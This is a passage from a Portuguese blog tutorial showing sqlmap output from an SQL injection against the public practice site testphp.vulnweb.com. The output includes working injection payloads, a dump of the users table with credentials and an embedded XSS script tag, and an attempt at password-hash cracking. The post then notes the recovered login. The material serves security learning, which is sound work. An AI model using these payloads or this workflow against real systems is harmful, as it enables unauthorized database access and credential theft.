sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:16:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:16:44] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:16:44] [INFO] fetching entries of column(s) 'address, cart, cc, email, name, pass, phone, uname' for table 'users' in database 'acuart'
[19:16:44] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [19:19:59] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [19:20:25] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [19:20:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[19:20:34] [INFO] starting 4 processes
[19:20:34] [INFO] current status: =-=-=... |
[19:20:34] [INFO] current status: ; ... |
[19:20:34] [INFO] current status: !#%&*... /
[19:20:34] [INFO] current status: ........ -
[19:20:51] [INFO] current status: zz836... \
[19:20:51] [INFO] current status: ZzDxg... |
[19:20:51] [INFO] current status: zzl57... |
[19:20:51] [INFO] current status: zzQLx... /
[19:20:51] [INFO] current status: zzubb... -
[19:20:51] [INFO] current status: zzz1p... \
[19:20:51] [INFO] current status: zzzzz... |[19:20:52] [WARNING] no clear password(s) found
Database: acuart
Table: users
[1 entry]
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| address | cart | cc | email | name | pass | phone | uname |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| LAMMERS IDIOTAS KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK\r\n<script>alert("LAMMER LIXO")</script> | 7dc9c50b4891e22263bca11a0ce717bf | TUDO LAMMER USANDO HAVIJ | TUDO LAMMER USANDO SQLMAP | aaaaaaaaaaaaaaaaa | test | <blank> | test |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
[19:20:52] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[19:20:52] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:20:52

Como pode perceber, foi retonado algumas informações da tabela user, onde foi possível localizar o usuario e senha da aplicação.

Com o usuario "test" e Senha "test", será possível logar na aplicação através deste link "http://testphp.vulnweb.com/login.php".

Postado por, Josué Pedro.

Formado em Sistema da Informação pela Universidade Nove de Julho, Pós graduado em Cyber Security pela Impacta Parceria com a Daryus.

Há um bom tempo que trabalha na Área da tecnologia da Informação e é criador de conteúdos para canal de youtube e mídia social.

Tem auto conhecimento em Tecnologia, Mídia Social, Marketing Digital, SEO, Goolge Adword, Google Adsense, Google Master.

Nas horas disponível, trabalha como freelancer procurando bugs vulneráveis em sistemas através da plataforma "Hacker One".

Trabalha também com freelancer em projetos relacionado a tecnologia através da plataforma Workana.

Pesquisas

Total de visualizações de página

orientação em tecnologia

Postagem em destaque

COMPARTILHAR ARQUIVOS EM UMA REDE LOCAL NO WINDOWS 10 - Configuração de ...